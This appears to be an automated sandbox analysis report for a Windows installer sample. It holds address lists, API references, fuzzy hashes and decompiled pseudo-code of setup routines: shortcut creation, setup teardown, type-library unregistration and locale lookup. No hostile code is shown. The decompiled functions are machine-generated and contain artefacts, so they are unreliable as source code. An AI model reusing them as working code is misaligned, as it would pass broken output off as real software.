0x0044d7d0
0x0044d7d0
0x0044d7d9
0x0044d7dc
0x0044d7de
0x0044d7e0
0x0044d7e0
0x0044d7ea
0x0044d7ef
0x0044d800
0x0044d808
0x0044d808
0x0044d813
0x0044d815
0x0044d815
0x0044d830
0x0044d842
0x0044d867
0x0044d873
0x0044d883
0x0044d8af
0x0044d8b1
0x0044d8ba
0x0044d8c4
0x0044d8c4
0x0044d8d5
0x0044d8dc
0x0044d8df
0x0044d8e2
0x0044d8ef
0x0044d8ef
0x0044d50a
0x0044d516
0x0044d51c
0x0044d522
0x0044d527
0x0044d52a
0x0044d530
0x0044d532
0x0044d534
0x0044d534
0x0044d537
0x0044d539
0x0044d547
0x0044d556
0x0044d563
0x0044d60a
0x0044d60d
0x0044d611
0x0044d626
0x0044d62f
0x0044d632
0x0044d66e
0x0044d671
0x0044d678
0x0044d698
0x0044d69d
0x0044d69f
0x0044d6a6
0x0044d6c5
0x00000000
0x0044d6c5
0x0044d683
0x0044d686
0x00000000
0x00000000
0x0044d68f
0x00000000
0x0044d68f
0x0044d637
0x0044d63e
0x0044d64e
0x0044d655
0x00000000
0x0044d655
0x0044d649
0x0044d64c
0x0044d665
0x00000000
0x0044d665
0x00000000
0x0044d64c
0x0044d61a
0x00000000
0x0044d569
0x0044d56c
0x0044d56e
0x0044d58b
0x0044d570
0x0044d570
0x0044d594
0x0044d572
0x0044d57e
0x0044d57e
0x0044d570
0x0044d5a3
0x0044d5a5
0x0044d5a5
0x0044d5af
0x0044d5b1
0x0044d5b1
0x0044d5c3
0x0044d5df
0x0044d5df
0x0044d5f4
0x0044d6cb
0x0044d6d7
0x00000000
0x0044d6d7
0x0044d563
0x0044d3d8
0x0044d3ed
0x0044d3f3
0x0044d3f6
0x0044d3fd
0x0044d400
0x0044d402
0x0044d408
0x0044d40f
0x0044d415
0x0044d417
0x0044d417
0x0044d41b
0x0044d424
0x0044d439
0x0044d43c
0x0044d43e
0x0044d440
0x0044d440
0x0044d44e
0x0044d451
0x0044d456
0x0044d459
0x0044d45b
0x0044d45d
0x0044d45f
0x0044d45f
0x0044d462
0x0044d464
0x0044d467
0x0044d470
0x0044d47d
0x0044d481
0x0044d486
0x0044d486
0x0044d492
0x0044d493
0x0044d49b
0x0044d4a5
0x0044d4a7
0x0044d4a9
0x0044d4a9
0x0044d4c1
0x0044d4c1
0x0044d4e5
0x0044d4e5
0x0044d4ea
0x0044d4eb
0x0044d4eb
0x0044d4eb
0x0044d402

APIs

SendMessageA.USER32 ref: 0044D370
LineDDA.GDI32(?,?,?,?,Function_0004CC0C,?), ref: 0044D4C1
LineDDA.GDI32(?,?,?,?,Function_0004CC0C,?), ref: 0044D4E5
DrawFrameControl.USER32 ref: 0044D5F4

Part of subcall function 0041AE78: FillRect.USER32 ref: 0041AEA0

GetTextColor.GDI32(00000000), ref: 0044D6EF
GetSysColor.USER32(00000011), ref: 0044D711
SetTextColor.GDI32(00000000,00000000), ref: 0044D71F
SetTextColor.GDI32(00000000,00000000), ref: 0044D749
OffsetRect.USER32(00000000,00000000,?), ref: 0044D7EA
InflateRect.USER32(?,00000001,00000001), ref: 0044D8BA
SetTextColor.GDI32(00000000,?), ref: 0044D8D5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$Text$Rect$Line$ControlDrawFillFrameInflateMessageOffsetSend
String ID:
API String ID: 3787931423-0
Opcode ID: 8d3b795b23396b74c6bda2151974275fd6bbaad99acda5bf9f556032f60e7eca
Instruction ID: 29825b675fd66129f00336e62122b199df2c2466ac734b8478b89012465c1a86
Opcode Fuzzy Hash: 8d3b795b23396b74c6bda2151974275fd6bbaad99acda5bf9f556032f60e7eca
Instruction Fuzzy Hash: 2B120C74E00248AFEB01DBA8C985BEEBBF5AF49304F1445A6E544E7352D738AE41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0046A814 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0046A814(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				char _v25;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _t143;
				signed char _t206;
				intOrPtr _t236;
				intOrPtr _t250;
				void* _t252;
				void* _t254;
				void* _t256;
				void* _t257;
				intOrPtr _t258;
				void* _t259;

				_t259 = __eflags;
				_t256 = _t257;
				_t258 = _t257 + 0xffffffd8;
				_v32 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_t252 = __ecx;
				_t254 = __edx;
				_v8 = __eax;
				E00403870(_v8);
				_push(_t256);
				_push(0x46ab24);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				E004038C0(_v8, 8, 1,  &_v32);
				E004037CC(_v32, "{group}\\");
				_v9 = _t259 == 0;
				E004717F8(_v8, 8,  &_v32);
				E004035DC( &_v8, _v32);
				E00403708( &_v16, 0x46ab50, _v8);
				E00403708( &_v20, 0x46ab60, _v8);
				_t206 =  *0x46ab68; // 0x8
				_t260 = _a16;
				if(_a16 == 0) {
					__eflags = _v9;
					if(_v9 != 0) {
						__eflags = _t206;
					}
				} else {
					_t206 = _t206 | 0x00000001;
				}
				_v40 = _v16;
				_v36 = 0xb;
				E00455A04("Filename: %s", _t206, 0,  &_v40, _t252, _t254);
				E00466AE0(_v16, _t206, 1, _t252, _t254, _t260);
				E0042C990(_v16, 0,  &_v32);
				E00467F84(0, _t206, _t206, _v32, _t252, _t254, _t260,  *((intOrPtr*)(_a40 + 8)));
				E00407064(_v16);
				E00407064(_v20);
				_t214 = _t252;
				E00454838(_v16, _t206, _t252, _t254, _t252, _t254,  &_v24, _a4, _a8, _a20, _a24, _a28, _a32, _a36);
				 *0x4ae294 = 1;
				_t261 = _a4;
				if(_a4 == 0 || E0042CE28(_t261) == 0) {
					_t143 = 0;
				} else {
					_t143 = 1;
				}
				_v25 = _t143;
				if(_a12 != 0) {
					_t264 = _v25;
					if(_v25 == 0) {
						E0042C9E8(_v24, _t214,  &_v32, _t264);
						if(E00406B28(_v32, 0x46ab60) == 0) {
							_push(_t256);
							_push( *[fs:eax]);
							 *[fs:eax] = _t258;
							E00453930(_v24, _t206, 0x46ab00 | _a12 == 0x00000001);
							_pop(_t250);
							_t214 = 0x46a9af;
							 *[fs:eax] = _t250;
						}
					}
				}
				if(_v25 == 0) {
					SHChangeNotify(2, 1, E00403880(_v24), 0);
				} else {
					SHChangeNotify(8, 1, E00403880(_v24), 0);
				}
				E0042C990(_v24, _t214,  &_v32);
				SHChangeNotify(0x1000, 0x1001, E00403880(_v32), 0);
				if(_a16 == 0) {
					_t269 = _v25;
					if(_v25 == 0) {
						_v44 = _v16;
						E00456F28( *((intOrPtr*)( *((intOrPtr*)(_a40 + 8)) - 4)), _t206,  &_v44, 0x82, _t252, _t254, 0x20, 0);
						_v44 = _v20;
						E00456F28( *((intOrPtr*)( *((intOrPtr*)(_a40 + 8)) - 4)), _t206,  &_v44, 0x82, _t252, _t254, 0x20, 0);
					} else {
						_v44 = _v24;
						E00456F28( *((intOrPtr*)( *((intOrPtr*)(_a40 + 8)) - 4)), _t206,  &_v44, 0x81, _t252, _t254, 0x12, 0);
						E0042C614(_v24,  &_v32);
						E004036C4( &_v32, "target.lnk");
						_v44 = _v32;
						E00456F28( *((intOrPtr*)( *((intOrPtr*)(_a40 + 8)) - 4)), _t206,  &_v44, 0x82, _t252, _t254, 0, 0);
						E0042C614(_v24,  &_v32);
						E004036C4( &_v32, "Desktop.ini");
						_v44 = _v32;
						E00456F28( *((intOrPtr*)( *((intOrPtr*)(_a40 + 8)) - 4)), _t206,  &_v44, 0x82, _t252, _t254, 0, 0);
					}
				}
				E00466CCC(0x3e8, _t269);
				_pop(_t236);
				 *[fs:eax] = _t236;
				_push(0x46ab2b);
				E00403548( &_v32);
				E00403568( &_v24, 3);
				return E00403548( &_v8);
			}

0x0046a814
0x0046a815
0x0046a817
0x0046a81f
0x0046a822
0x0046a825
0x0046a828
0x0046a82b
0x0046a82d
0x0046a82f
0x0046a835
0x0046a83c
0x0046a83d
0x0046a842
0x0046a845
0x0046a859
0x0046a866
0x0046a86b
0x0046a875
0x0046a880
0x0046a890
0x0046a8a0
0x0046a8a5
0x0046a8ab
0x0046a8af
0x0046a8b6
0x0046a8ba
0x0046a8bc
0x0046a8bc
0x0046a8b1
0x0046a8b1
0x0046a8b1
0x0046a8c2
0x0046a8c5
0x0046a8d3
0x0046a8dd
0x0046a8ef
0x0046a8fb
0x0046a904
0x0046a90c
0x0046a932
0x0046a939
0x0046a93e
0x0046a945
0x0046a949
0x0046a957
0x0046a95b
0x0046a95b
0x0046a95b
0x0046a95d
0x0046a964
0x0046a966
0x0046a96a
0x0046a972
0x0046a986
0x0046a98a
0x0046a990
0x0046a993
0x0046a9a0
0x0046a9a7
0x0046a9a9
0x0046a9aa
0x0046a9aa
0x0046a986
0x0046a96a
0x0046a9bd
0x0046a9e4
0x0046a9bf
0x0046a9ce
0x0046a9ce
0x0046a9f1
0x0046aa09
0x0046aa12
0x0046aa18
0x0046aa1c
0x0046aab8
0x0046aacb
0x0046aad7
0x0046aaea
0x0046aa22
0x0046aa29
0x0046aa3c
0x0046aa4b
0x0046aa58
0x0046aa60
0x0046aa73
0x0046aa82
0x0046aa8f
0x0046aa97
0x0046aaaa
0x0046aaaa
0x0046aa1c
0x0046aaf4
0x0046aafb
0x0046aafe
0x0046ab01
0x0046ab09
0x0046ab16
0x0046ab23

APIs

SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046A9CE

Strings

{group}\, xrefs: 0046A861
target.lnk, xrefs: 0046AA53
.lnk, xrefs: 0046A888
Desktop.ini, xrefs: 0046AA8A
Filename: %s, xrefs: 0046A8CE
.pif, xrefs: 0046A898, 0046A97A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ChangeNotify
String ID: .lnk$.pif$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 3893256919-3966328851
Opcode ID: 9da8b10eac19d506992f30dfad9fe59346644c67ed2cc8e8f142a27cfd7fa1a0
Instruction ID: cb0f44c2eacfa593aecfd76b13abc03a808929be95f0810db82bab9681137302
Opcode Fuzzy Hash: 9da8b10eac19d506992f30dfad9fe59346644c67ed2cc8e8f142a27cfd7fa1a0
Instruction Fuzzy Hash: 46A14174A001499FDB00DF95C882BEEBBF4AF08304F50856AF914B7391D678AE45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004760BC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 195
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004760BC(void* __eax, void* __ebx, intOrPtr __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t38;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr* _t81;
				signed int _t82;
				intOrPtr _t87;
				intOrPtr _t93;
				intOrPtr _t95;
				void* _t99;
				void* _t101;
				void* _t102;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t127;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t139;
				void* _t141;
				void* _t142;
				intOrPtr _t143;

				_t165 = __fp0;
				_t135 = __edi;
				_t141 = _t142;
				_t143 = _t142 + 0xfffffff4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t99 = __eax;
				_push(_t141);
				_push(0x476361);
				_push( *[fs:eax]);
				 *[fs:eax] = _t143;
				E00455814("Deinitializing Setup.", __eax, __edi, __esi);
				if( *0x4ae298 != 0) {
					_t146 = _t99;
					if(_t99 != 0) {
						_push(_t141);
						_push(0x476137);
						_push( *[fs:eax]);
						 *[fs:eax] = _t143;
						_t93 =  *0x4ae290; // 0x0
						_v12 = 0;
						_v8 = 0xb;
						_t95 =  *0x4ae298; // 0x21fdcf0
						 *0x4ae290 = E004876A0(_t95,  &_v12, "GetCustomSetupExitCode", _t146, __fp0, _t93, 0, 0);
						_pop(_t134);
						 *[fs:eax] = _t134;
					}
					_push(_t141);
					_push(0x47618e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t143;
					_v12 = 0;
					_v8 = 0xb;
					_t87 =  *0x4ae298; // 0x21fdcf0
					E00487508(_t87,  &_v12, "DeinitializeSetup", _t146, _t165, 0, 0);
					_pop(_t132);
					 *[fs:eax] = _t132;
					E0042E314(0x4ae298);
				}
				_t32 =  *0x4ae270; // 0x21d2b8c
				_t138 =  *((intOrPtr*)( *_t32 + 0x10))() - 1;
				if(_t138 < 0) {
					L8:
					_t34 =  *0x4ae270; // 0x21d2b8c
					 *((intOrPtr*)( *_t34 + 0x38))();
					_t36 =  *0x4ae274; // 0x21d2bb8
					_t101 =  *((intOrPtr*)( *_t36 + 0x10))() - 1;
					if(_t101 < 0) {
						L10:
						_t38 =  *0x4ae274; // 0x21d2bb8
						 *((intOrPtr*)( *_t38 + 0x38))();
						E004660BC();
						E00455FB0(1);
						E00455B18(0);
						if( *0x4ae318 != 0) {
							_t69 =  *0x4ae318; // 0x10000000
							FreeLibrary(_t69);
						}
						if( *0x4ae314 != 0) {
							_t67 =  *0x4ae314; // 0x0
							FreeLibrary(_t67);
						}
						E00472364();
						if( *0x4ae018 != 0) {
							if( *0x48deec != 0) {
								E00455138(0);
							}
							_t122 =  *0x4ae018; // 0x21fdbec
							if(E004526D0(0, _t101, 1, _t122, _t135, _t138, 0, 0, 0, 1, 1) == 0) {
								E004035DC( &_v16, "Failed to remove temporary directory: ");
								_t124 =  *0x4ae018; // 0x21fdbec
								E004036C4( &_v16, _t124);
								E00455814(_v16, _t101, _t135, _t138);
							}
						}
						if( *0x4ae257 != 0 &&  *0x48deec != 0) {
							E00455814("Not restarting Windows because Setup is being run from the debugger.", _t101, _t135, _t138);
							 *0x4ae257 = 0;
						}
						E00454EC4();
						if( *0x4ae257 != 0) {
							E00455814("Restarting Windows.", _t101, _t135, _t138);
							if( *0x4adf94 == 0) {
								E00453A8C();
							} else {
								SendMessageA( *0x4adf98, 0x496, 0x2710, 0);
							}
						}
						_pop(_t121);
						 *[fs:eax] = _t121;
						_push(E00476368);
						return E00403548( &_v16);
					} else {
						goto L9;
					}
					do {
						L9:
						_t71 =  *0x4ae274; // 0x21d2bb8
						_t138 =  *_t71;
						 *((intOrPtr*)( *_t71 + 0xc))();
						_t74 =  *0x4ae274; // 0x21d2bb8
						_t75 =  *((intOrPtr*)( *_t74 + 0x14))(_v16);
						_pop(_t127);
						E004518A0(_t75 & 0xffffff00 | _t75 != 0x00000000, _t127, _t75);
						_t101 = _t101 - 1;
					} while (_t101 != 0xffffffff);
					goto L10;
				} else {
					_t139 = _t138 + 1;
					_t102 = 0;
					do {
						_t78 =  *0x4ae270; // 0x21d2b8c
						_t135 =  *_t78;
						 *((intOrPtr*)( *_t78 + 0xc))();
						_t81 =  *0x4ae270; // 0x21d2b8c
						_t82 =  *((intOrPtr*)( *_t81 + 0x14))(_v16);
						_pop(_t130);
						E004513FC(_t82 & 0xffffff00 | _t82 != 0x00000000, _t130, _t82);
						_t102 = _t102 + 1;
						_t139 = _t139 - 1;
					} while (_t139 != 0);
					goto L8;
				}
			}

0x004760bc
0x004760bc
0x004760bd
0x004760bf
0x004760c2
0x004760c3
0x004760c4
0x004760c7
0x004760ca
0x004760ce
0x004760cf
0x004760d4
0x004760d7
0x004760df
0x004760eb
0x004760f1
0x004760f3
0x004760f7
0x004760f8
0x004760fd
0x00476100
0x00476107
0x0047610f
0x00476112
0x0047611e
0x00476128
0x0047612f
0x00476132
0x00476132
0x00476159
0x0047615a
0x0047615f
0x00476162
0x0047616b
0x0047616e
0x0047617a
0x0047617f
0x00476186
0x00476189
0x004761b3
0x004761b3
0x004761b8
0x004761c4
0x004761c7
0x004761fa
0x004761fa
0x00476201
0x00476204
0x00476210
0x00476214
0x00476246
0x00476246
0x0047624d
0x00476250
0x00476257
0x0047625e
0x0047626a
0x0047626c
0x00476272
0x00476272
0x0047627e
0x00476280
0x00476286
0x00476286
0x0047628b
0x00476297
0x004762a0
0x004762a4
0x004762a4
0x004762b5
0x004762c4
0x004762ce
0x004762d6
0x004762dc
0x004762e4
0x004762e4
0x004762c4
0x004762f0
0x00476300
0x00476305
0x00476305
0x0047630c
0x00476318
0x0047631f
0x0047632b
0x00476346
0x0047632d
0x0047633f
0x0047633f
0x0047632b
0x0047634d
0x00476350
0x00476353
0x00476360
0x00000000
0x00000000
0x00000000
0x00476216
0x00476216
0x0047621b
0x00476220
0x00476222
0x0047622b
0x00476232
0x0047623a
0x0047623b
0x00476240
0x00476241
0x00000000
0x004761c9
0x004761c9
0x004761ca
0x004761cc
0x004761d1
0x004761d6
0x004761d8
0x004761e1
0x004761e8
0x004761f0
0x004761f1
0x004761f6
0x004761f7
0x004761f7
0x00000000
0x004761cc

APIs

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

FreeLibrary.KERNEL32(10000000), ref: 00476272
FreeLibrary.KERNEL32(00000000), ref: 00476286
SendMessageA.USER32 ref: 0047633F

Strings

Not restarting Windows because Setup is being run from the debugger., xrefs: 004762FB
Deinitializing Setup., xrefs: 004760DA
Failed to remove temporary directory: , xrefs: 004762C6
Restarting Windows., xrefs: 0047631A
DeinitializeSetup, xrefs: 00476175
GetCustomSetupExitCode, xrefs: 00476119

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FreeLibrary$LocalMessageSendTime
String ID: DeinitializeSetup$Deinitializing Setup.$Failed to remove temporary directory: $GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 2162613394-2206919510
Opcode ID: 18c68de9d0433fac5ded999f178f0a1e2ecf96367b30fddc6078c2647e76adbf
Instruction ID: 8fd14bc63f5d7aaa3e576020743329ac8f9968c78294aede35f61ac6d25d72c5
Opcode Fuzzy Hash: 18c68de9d0433fac5ded999f178f0a1e2ecf96367b30fddc6078c2647e76adbf
Instruction Fuzzy Hash: 6161E630A00A009FD710EF76D895B9A7BA9EB46304F51C5BBF818973A2CB389C45CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00454BC0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00454BC0(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t21;
				intOrPtr _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr* _t36;
				struct HINSTANCE__* _t49;
				void* _t50;
				intOrPtr _t62;
				struct HINSTANCE__* _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;

				_t50 = __ecx;
				_t71 = _t72;
				_t73 = _t72 + 0xfffffff0;
				_v20 = 0;
				_t69 = __eax;
				_push(_t71);
				_push(0x454d25);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				_push("UnRegisterTypeLib");
				_t21 = GetModuleHandleA("OLEAUT32.DLL");
				_push(_t21);
				L00405AA4();
				_t67 = _t21;
				_t49 = _t67;
				_t74 = _t67;
				if(_t67 == 0) {
					E00451B58("GetProcAddress", _t49, _t50, _t67, _t69, _t74);
				}
				E0042C8F0(_t69,  &_v20);
				_v8 = E00403DEC(_v20);
				if(_v8 == 0) {
					E00408DE4();
				}
				_push(_t71);
				_push(0x454d08);
				_push( *[fs:edx]);
				 *[fs:edx] = _t73;
				_push( &_v12);
				_t27 = _v8;
				_push(_t27);
				L0042CD54();
				_t76 = _t27;
				if(_t27 != 0) {
					E00451C00("LoadTypeLib", _t49, _t27, _t67, _t69, _t76);
				}
				 *[fs:edx] = _t73;
				_t29 = _v12;
				_t31 =  *((intOrPtr*)( *_t29 + 0x1c))(_t29,  &_v16,  *[fs:edx], 0x454cea, _t71);
				_t77 = _t31;
				if(_t31 != 0) {
					E00451C00("ITypeLib::GetLibAttr", _t49, _t31, _t67, _t69, _t77);
				}
				 *[fs:edx] = _t73;
				_t32 = _v16;
				_t33 = _t49->i(_t32,  *((intOrPtr*)(_t32 + 0x18)),  *((intOrPtr*)(_t32 + 0x1a)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)),  *[fs:edx], 0x454ccc, _t71);
				_t78 = _t33;
				if(_t33 != 0) {
					E00451C00("UnRegisterTypeLib", _t49, _t33, _t67, _t69, _t78);
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t36 = _v12;
				return  *((intOrPtr*)( *_t36 + 0x30))(_t36, _v16, E00454CD3);
			}

0x00454bc0
0x00454bc1
0x00454bc3
0x00454bcb
0x00454bce
0x00454bd2
0x00454bd3
0x00454bd8
0x00454bdb
0x00454bde
0x00454be8
0x00454bed
0x00454bee
0x00454bf3
0x00454bf5
0x00454bf7
0x00454bf9
0x00454c00
0x00454c00
0x00454c0a
0x00454c17
0x00454c1e
0x00454c20
0x00454c20
0x00454c27
0x00454c28
0x00454c2d
0x00454c30
0x00454c36
0x00454c37
0x00454c3a
0x00454c3b
0x00454c40
0x00454c42
0x00454c4b
0x00454c4b
0x00454c5b
0x00454c62
0x00454c68
0x00454c6b
0x00454c6d
0x00454c76
0x00454c76
0x00454c86
0x00454c89
0x00454c9f
0x00454ca1
0x00454ca3
0x00454cac
0x00454cac
0x00454cb3
0x00454cb6
0x00454cc2
0x00454ccb

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454D25,?,?,00000000,?), ref: 00454BE8
6D2B5550.KERNEL32(00000000,OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454D25,?,?,00000000,?), ref: 00454BEE
LoadTypeLib.OLEAUT32(00000000,?), ref: 00454C3B

Part of subcall function 00451B58: GetLastError.KERNEL32(00000000,00451BF0,?,?,00000000,00000000,00000005,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451B7C

Strings

OLEAUT32.DLL, xrefs: 00454BE3
LoadTypeLib, xrefs: 00454C46
ITypeLib::GetLibAttr, xrefs: 00454C71
UnRegisterTypeLib, xrefs: 00454CA7
GetProcAddress, xrefs: 00454BFB
UnRegisterTypeLib, xrefs: 00454BDE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550ErrorHandleLastLoadModuleType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 2424599714-2711329623
Opcode ID: 2c455773a72f526190eea25b1ca9c224068188e8d601d2fbdca99d02f883b31b
Instruction ID: 868c0199dbdae99bfada457dfd6d9c206ed9773a2acbf400e954dfa04317f0b4
Opcode Fuzzy Hash: 2c455773a72f526190eea25b1ca9c224068188e8d601d2fbdca99d02f883b31b
Instruction Fuzzy Hash: CE318371A00604AFC702EFAACC51D5B77BDEFC87497128466F804DB652EB38D948C668

Uniqueness

Uniqueness Score: -1.00%

Function 0042E3A8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042E3A8(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t49;
				intOrPtr _t63;
				void* _t71;

				_v20 = 0;
				_v12 = 0;
				_push(_t71);
				_push(0x42e4ad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xfffffff0;
				_push("GetUserDefaultUILanguage");
				_t21 = GetModuleHandleA("kernel32.dll");
				_push(_t21);
				L00405AA4();
				_t49 = _t21;
				if(_t49 == 0) {
					if( *0x48c0e0 != 2) {
						if(E0042DD88(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E0042DCB8();
							RegCloseKey(_v8);
						}
					} else {
						if(E0042DD88(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E0042DCB8();
							RegCloseKey(_v8);
						}
					}
					E004035DC( &_v20, 0x42e550);
					E004036C4( &_v20, _v12);
					E00402B08(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					_t49->i();
				}
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E0042E4B4);
				E00403548( &_v20);
				return E00403548( &_v12);
			}

0x0042e3b3
0x0042e3b6
0x0042e3bb
0x0042e3bc
0x0042e3c1
0x0042e3c4
0x0042e3c7
0x0042e3d1
0x0042e3d6
0x0042e3d7
0x0042e3dc
0x0042e3e0
0x0042e3f2
0x0042e447
0x0042e454
0x0042e45d
0x0042e45d
0x0042e3f4
0x0042e40f
0x0042e41c
0x0042e425
0x0042e425
0x0042e40f
0x0042e46a
0x0042e475
0x0042e480
0x0042e48b
0x0042e48b
0x0042e3e2
0x0042e3e2
0x0042e3e4
0x0042e491
0x0042e494
0x0042e497
0x0042e49f
0x0042e4ac

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E4AD,?,?,00000000,00000000,?,00000000,00475469,?,00000001,00000000,00000002,00000000), ref: 0042E3D1
6D2B5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E4AD,?,?,00000000,00000000,?,00000000,00475469,?,00000001,00000000,00000002), ref: 0042E3D7
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E4AD,?,?,00000000,00000000,?,00000000,00475469), ref: 0042E425

Strings

.DEFAULT\Control Panel\International, xrefs: 0042E3FC
Control Panel\Desktop\ResourceLocale, xrefs: 0042E434
GetUserDefaultUILanguage, xrefs: 0042E3C7
Locale, xrefs: 0042E414
kernel32.dll, xrefs: 0042E3CC

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550CloseHandleModule
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 988726543-2401316094
Opcode ID: aa7242408ec27734a04db55b95a82169450c42e8d17fcad2c02b09953d234269
Instruction ID: 42975018092ea5af1ab03705ecb409ec905e8f45b3c52ab5cd254af03c4ba0cb
